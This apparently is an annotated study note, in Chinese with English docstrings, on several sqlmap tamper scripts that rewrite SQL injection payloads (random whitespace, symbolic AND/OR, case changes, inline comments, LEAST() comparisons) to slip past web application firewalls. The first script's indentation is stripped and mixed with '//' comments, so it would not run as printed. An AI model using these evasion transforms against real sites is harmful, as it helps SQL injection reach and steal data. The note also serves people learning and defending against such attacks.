space2randomblank
作用:空格替换为备选字符集中的随机字符
例子:
('select id from users')
('select%0Did%0DFROM%0Ausers')
详细注释:
#!/usr/bin/env python//此处用法为:程序到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作
""" //python 的多行注释符
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import random
from lib.core.compat import xrange //导入sqlmap中的lib/core/compat中的xrange函数
from lib.core.enums import PRIORITY//导入sqlmap中lib/core/enums 中的PRIORITY函数
__priority__ = PRIORITY.LOW//定义优先级,此处级别为一般
def dependencies():
    """Declare nothing: this script has no extra requirements.

    Present only so the module exposes the same entry points as every other
    sqlmap tamper script.
    """
    return None
def tamper(payload, **kwargs)://定义tamper 脚本,payload, **kwargs为定义的参数
""" //多行注释符
Replaces space character (' ') with a random blank character from a valid set of alternate characters //此处为tamper说明,以便使用该脚本
Tested against: //用于多种数据库,并且作用与弱防护效果的防火墙
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
"""
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
blanks = ("%09", "%0A", "%0C", "%0D")
retVal = payload
if payload: //判断payload
retVal = "" //将retVal 赋值为空语句
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload))://xrange为一个生成器
if not firstspace:
if payload[i].isspace()://检测字符串是否只由空格组成
firstspace = True//将true 赋给firstspace
retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项
continue//跳出本次循环
elif payload[i] == '\''://判断字符是否为'\'
quote = not quote
elif payload[i] == '"'://判断字符是否为"
doublequote = not doublequote
elif payload[i] == ' ' and not doublequote and not quote:
retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项
continue//跳出本次循环
retVal += payload[i]
return retVal//返回随机字符
symboliclogical
作用:AND和OR替换为&&和||
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
    """No external requirements; kept for parity with the tamper interface."""
def tamper(payload, **kwargs):
    r"""Rewrite the words AND / OR as their URL-encoded symbolic forms.

    Transformation: every case-insensitive whole-word ``OR`` becomes
    ``%7C%7C`` (``||``) and every whole-word ``AND`` becomes ``%26%26``
    (``&&``). The ``\b`` anchors leave words such as ``ORDER`` untouched,
    but no quote tracking is done, so the words are rewritten inside string
    literals as well.

    Detection note: ``%26%26`` / ``%7C%7C`` decode to ``&&`` / ``||``;
    URL-decoding before operator matching restores the original tokens.

    Args:
        payload: SQL payload string to rewrite. Falsy values are returned
            unchanged.
        **kwargs: Accepted for interface compatibility; not used.

    Returns:
        The rewritten payload, or *payload* itself when it is falsy.

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """
    if not payload:
        return payload
    # OR is rewritten first, then AND, mirroring the original nesting order.
    with_or = re.sub(r"(?i)\bOR\b", "%7C%7C", payload)
    return re.sub(r"(?i)\bAND\b", "%26%26", with_or)
uppercase
作用:全部替换为大写值
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
    """Declare nothing; this script needs no additional components."""
    return
def tamper(payload, **kwargs):
    """Upper-case every word of *payload* that is a known SQL keyword.

    Transformation: runs of ``[A-Za-z_]`` are scanned; each run whose
    upper-cased form is found in ``kb.keywords`` is replaced, via
    ``str.replace`` over the whole string, by its upper-cased form. Because
    the replace is not anchored to the match, the same text can be
    upper-cased inside a longer token too (existing behaviour, preserved).

    Tested against (per upstream): Microsoft SQL Server 2005; MySQL 4, 5.0
    and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0.

    Detection note: case-insensitive keyword matching is unaffected by this
    transform.

    Args:
        payload: SQL payload string to rewrite. Falsy values are returned
            unchanged.
        **kwargs: Accepted for interface compatibility; not used.

    Returns:
        The rewritten payload, or *payload* itself when it is falsy.

    >>> tamper('insert')
    'INSERT'
    """
    if not payload:
        return payload
    rewritten = payload
    # The word list is taken from the untouched input; replacements happen on
    # the running copy.
    for word in re.findall(r"[A-Za-z_]+", payload):
        if word.upper() in kb.keywords:
            rewritten = rewritten.replace(word, word.upper())
    return rewritten
informationschemacomment
作用:标识符后添加注释
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs):
    """Insert an inline comment between ``information_schema`` and its dot.

    Transformation: every case-insensitive occurrence of
    ``information_schema.`` becomes ``information_schema/**/.``; the
    identifier keeps the casing it had in *payload*. Aimed at MySQL, whose
    comment syntax this is.

    Detection note: stripping ``/**/`` sequences before identifier matching
    restores the plain ``information_schema.`` reference.

    Args:
        payload: SQL payload string to rewrite. Falsy values are returned
            unchanged.
        **kwargs: Accepted for interface compatibility; not used.

    Returns:
        The rewritten payload, or *payload* itself when it is falsy.

    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
    """
    if not payload:
        return payload
    schema_dot = re.compile(r"(?i)(information_schema)\.")
    return schema_dot.sub(lambda m: m.group(1) + "/**/.", payload)
least
作用:替换大于号为least
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
    """Placeholder hook: this script declares no external requirements."""
    return None
def tamper(payload, **kwargs):
    r"""Rewrite the first ``AND|OR <lhs> > <rhs>`` comparison with LEAST().

    Transformation: the first match of a whole-word AND/OR, a left operand,
    ``>`` and a right operand (a ``\w+`` word or a single-quoted literal) is
    rewritten as ``<op> LEAST(<lhs>,<rhs>+1)=<rhs>+1``. Only the first match
    is located, but because the substitution uses ``str.replace`` every
    identical occurrence of that matched text is rewritten.

    Tested against (per upstream): MySQL 4, 5.0 and 5.5; Oracle 10g;
    PostgreSQL 8.3, 8.4, 9.0.

    Detection note: a ``LEAST(x,y+1)=y+1`` pattern is an equivalent spelling
    of ``x > y``; rules that only look for the ``>`` character miss it.

    Args:
        payload: SQL payload string to rewrite. Falsy values are returned
            unchanged.
        **kwargs: Accepted for interface compatibility; not used.

    Returns:
        The rewritten payload, or *payload* itself when it is falsy or holds
        no matching comparison.

    >>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'
    """
    if not payload:
        return payload

    comparison = re.compile(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')")
    found = comparison.search(payload)
    if found is None:
        return payload

    prefix, left, right = found.group(1), found.group(3), found.group(4)
    replacement = "{}LEAST({},{}+1)={}+1".format(prefix, left, right, right)
    return payload.replace(found.group(0), replacement)
```python
lowercase
作用:将大写字母转化成小写字母
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
    """Interface stub: no extra components are required by this script."""
def tamper(payload, **kwargs):
    r"""Lower-case every whole word of *payload* that is a known SQL keyword.

    Transformation: words are taken as ``\b[A-Za-z_]+\b`` runs; a word whose
    upper-cased form is found in ``kb.keywords`` is replaced, via
    ``str.replace`` over the whole string, by its lower-cased form. Because
    the replace is not anchored to the match, the same text can be
    lower-cased inside a longer token too (existing behaviour, preserved).

    Tested against (per upstream): Microsoft SQL Server 2005; MySQL 4, 5.0
    and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0.

    Detection note: case-insensitive keyword matching is unaffected by this
    transform.

    Args:
        payload: SQL payload string to rewrite. Falsy values are returned
            unchanged.
        **kwargs: Accepted for interface compatibility; not used.

    Returns:
        The rewritten payload, or *payload* itself when it is falsy.

    >>> tamper('INSERT')
    'insert'
    """
    if not payload:
        return payload
    rewritten = payload
    # Word list comes from the untouched input; replacements apply to the
    # running copy.
    for word in re.findall(r"\b[A-Za-z_]+\b", payload):
        if word.upper() in kb.keywords:
            rewritten = rewritten.replace(word, word.lower())
    return rewritten